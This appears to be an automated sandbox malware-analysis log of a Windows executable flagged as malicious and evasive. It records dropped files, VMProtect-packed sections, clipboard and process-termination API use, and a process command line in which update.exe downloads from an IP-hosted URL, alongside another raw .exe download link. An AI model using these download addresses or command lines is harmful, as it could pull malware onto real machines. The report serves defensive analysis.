Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exez
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe~
Source: #U4fdd#U62a4#U795e1.exe, update.exe.4.dr, 16.exe.0.dr String found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
Source: 16.exe, 00000004.00000002.1882625896.0000000001369000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://trustsing.com/publish/iDefender.exew
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00437920 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00437920
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00437920 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00437920
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00437920 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_00437920
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00452E80 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_00452E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00437A80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_00437A80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00436180 GetKeyState,GetKeyState,GetKeyState,CopyRect, 0_2_00436180
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00496E82 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00496E82
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0049535B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_0049535B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004237C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_004237C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00421AA0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 0_2_00421AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00436180 GetKeyState,GetKeyState,GetKeyState,CopyRect, 3_2_00436180
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00496E82 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_00496E82
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0049535B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 3_2_0049535B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004237C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_004237C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00421AA0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 3_2_00421AA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043C0C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 7_2_0043C0C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004426E0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 7_2_004426E0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049706E GetKeyState,GetKeyState,GetKeyState,GetKeyState, 7_2_0049706E
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049557D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 7_2_0049557D
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004516E0 GetKeyState,GetKeyState,GetKeyState,CopyRect, 7_2_004516E0

System Summary

barindex
Source: 16.exe.0.dr Static PE information: .vmp0 and .vmp1 section names
Source: update.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: update.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048E06C 0_2_0048E06C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004400D0 0_2_004400D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456256 0_2_00456256
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004703C0 0_2_004703C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004523D0 0_2_004523D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047C440 0_2_0047C440
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00448412 0_2_00448412
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456541 0_2_00456541
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00466520 0_2_00466520
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045C530 0_2_0045C530
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004945FF 0_2_004945FF
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004705F0 0_2_004705F0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00432580 0_2_00432580
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468670 0_2_00468670
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00462620 0_2_00462620
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004566F4 0_2_004566F4
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00464830 0_2_00464830
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004828C0 0_2_004828C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045696E 0_2_0045696E
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00448970 0_2_00448970
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00452910 0_2_00452910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045C9AE 0_2_0045C9AE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044EA00 0_2_0044EA00
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0046CA20 0_2_0046CA20
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00466AA0 0_2_00466AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0042CB10 0_2_0042CB10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045CBFE 0_2_0045CBFE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041CD40 0_2_0041CD40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044ED10 0_2_0044ED10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456DA0 0_2_00456DA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0046CE40 0_2_0046CE40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455040 0_2_00455040
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004630C0 0_2_004630C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044F140 0_2_0044F140
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00457270 0_2_00457270
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004533D0 0_2_004533D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445450 0_2_00445450
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004194E0 0_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004574A0 0_2_004574A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045D700 0_2_0045D700
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445780 0_2_00445780
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B850 0_2_0041B850
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047B870 0_2_0047B870
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455880 0_2_00455880
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445910 0_2_00445910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00447B7B 0_2_00447B7B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00453BC0 0_2_00453BC0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045DBA0 0_2_0045DBA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00425BB0 0_2_00425BB0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00449D80 0_2_00449D80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047BD80 0_2_0047BD80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455D99 0_2_00455D99
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00489E16 0_2_00489E16
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00457EE0 0_2_00457EE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423E80 0_2_00423E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00447EAD 0_2_00447EAD
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00441FD0 0_2_00441FD0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048E06C 3_2_0048E06C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004400D0 3_2_004400D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456256 3_2_00456256
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004703C0 3_2_004703C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004523D0 3_2_004523D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047C440 3_2_0047C440
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00448412 3_2_00448412
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456541 3_2_00456541
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00466520 3_2_00466520
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045C530 3_2_0045C530
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004945FF 3_2_004945FF
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004705F0 3_2_004705F0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00432580 3_2_00432580
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00468670 3_2_00468670
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00462620 3_2_00462620
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004566F4 3_2_004566F4
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00464830 3_2_00464830
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004828C0 3_2_004828C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045696E 3_2_0045696E
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00448970 3_2_00448970
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00452910 3_2_00452910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045C9AE 3_2_0045C9AE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044EA00 3_2_0044EA00
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0046CA20 3_2_0046CA20
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00466AA0 3_2_00466AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0042CB10 3_2_0042CB10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045CBFE 3_2_0045CBFE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041CD40 3_2_0041CD40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044ED10 3_2_0044ED10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456DA0 3_2_00456DA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0046CE40 3_2_0046CE40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455040 3_2_00455040
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004630C0 3_2_004630C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044F140 3_2_0044F140
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00457270 3_2_00457270
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004533D0 3_2_004533D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445450 3_2_00445450
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004194E0 3_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004574A0 3_2_004574A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045D700 3_2_0045D700
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445780 3_2_00445780
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B850 3_2_0041B850
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047B870 3_2_0047B870
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455880 3_2_00455880
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445910 3_2_00445910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00447B7B 3_2_00447B7B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00453BC0 3_2_00453BC0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045DBA0 3_2_0045DBA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00425BB0 3_2_00425BB0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00449D80 3_2_00449D80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047BD80 3_2_0047BD80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455D99 3_2_00455D99
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00489E16 3_2_00489E16
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00457EE0 3_2_00457EE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423E80 3_2_00423E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00447EAD 3_2_00447EAD
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00441FD0 3_2_00441FD0
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184710 7_3_02184710
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184A00 7_3_02184A00
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02181260 7_3_02181260
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02182790 7_3_02182790
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02186480 7_3_02186480
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004393C0 7_2_004393C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046A110 7_2_0046A110
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043E2C0 7_2_0043E2C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004483E0 7_2_004483E0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048E4CD 7_2_0048E4CD
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047A500 7_2_0047A500
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043C780 7_2_0043C780
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049481C 7_2_0049481C
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043A890 7_2_0043A890
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046ABB0 7_2_0046ABB0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00482C90 7_2_00482C90
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046EEB0 7_2_0046EEB0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047AFF0 7_2_0047AFF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004730C0 7_2_004730C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B130 7_2_0047B130
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00437210 7_2_00437210
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B470 7_2_0047B470
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047D740 7_2_0047D740
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B7B0 7_2_0047B7B0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B990 7_2_0047B990
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00479AA0 7_2_00479AA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00459B60 7_2_00459B60
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0045BB90 7_2_0045BB90
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0044DBA0 7_2_0044DBA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00489F46 7_2_00489F46
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\update.exe E5C30E02DAA7C7178EE58F7F74F27A8CA4134AD736BA15CF34F863D8B70B2516
Source: C:\Users\user\Desktop\update.exe Code function: String function: 004827CF appears 42 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 004938DC appears 44 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00482EB2 appears 34 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00483717 appears 32 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 0042A5E3 appears 31 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00484854 appears 88 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 004823FB appears 84 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0046CA90 appears 46 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 004936BF appears 88 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00470080 appears 34 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E440 appears 154 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E2E0 appears 50 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E1C0 appears 78 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00491AE6 appears 52 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00483FF4 appears 198 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E030 appears 170 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0049234C appears 44 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0049B2C5 appears 40 times
Source: #U4fdd#U62a4#U795e1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal92.evad.winEXE@6/4@0/2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00478290 GetLastError,FormatMessageA, 7_2_00478290
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468C30 FindWindowA,GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,TerminateProcess, 0_2_00468C30
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468FE0 CoCreateInstance,MultiByteToWideChar, 0_2_00468FE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00492E30 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, 0_2_00492E30
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\???[1].txt Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Mutant created: \Sessions\1\BaseNamedObjects\tbdg
Source: #U4fdd#U62a4#U795e1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: #U4fdd#U62a4#U795e1.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe "C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe"
Source: unknown Process created: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe "C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe"
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process created: C:\Users\user\Desktop\ 16.exe C:\Users\user\Desktop\ 16.exe
Source: C:\Users\user\Desktop\ 16.exe Process created: C:\Users\user\Desktop\update.exe update.exe 1.2 16.exe http://38.6.175.25:901/down http://38.6.175.25:901
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process created: C:\Users\user\Desktop\ 16.exe C:\Users\user\Desktop\ 16.exe Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Process created: C:\Users\user\Desktop\update.exe update.exe 1.2 16.exe http://38.6.175.25:901/down http://38.6.175.25:901 Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coreuicomponents.dll Jump to behavior
